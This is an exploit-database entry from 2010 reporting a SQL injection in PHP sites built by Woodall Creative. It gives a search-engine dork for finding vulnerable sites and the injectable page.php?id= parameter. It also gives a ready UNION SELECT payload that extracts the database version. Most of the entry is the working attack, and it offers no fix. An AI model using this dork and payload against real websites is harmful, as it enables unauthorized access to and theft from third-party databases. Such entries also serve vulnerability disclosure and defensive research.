Woodall Creative - SQL Injection

EDB-ID:

12576

CVE:

N/A


Author:

XroGuE

Type:

webapps


Platform:

PHP

Date:

2010-05-11


=========================================================
Woodall Creative SQL Injection Vulnerability
=========================================================
##########################################
# Name: Woodall Creative SQL Injection Vulnerability
# Date: 2010-05-11
# vendor: http://www.woodallcreative.com
# Author: Ashiyane Digital Security Team
# Thanks to: khodam :P, Satanic2000,Veron, ... And All Ashiyane Members ...
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork:  intext: "Site developed & mantained by Woodall Creative Group"

[+] Vulnerability: www.site.com/[path]/page.php?id=[SQLi]  

[+] Live Demo: http://[site]/page.php?id=-999+union+select+1,2,3,4,5,6,7,@@version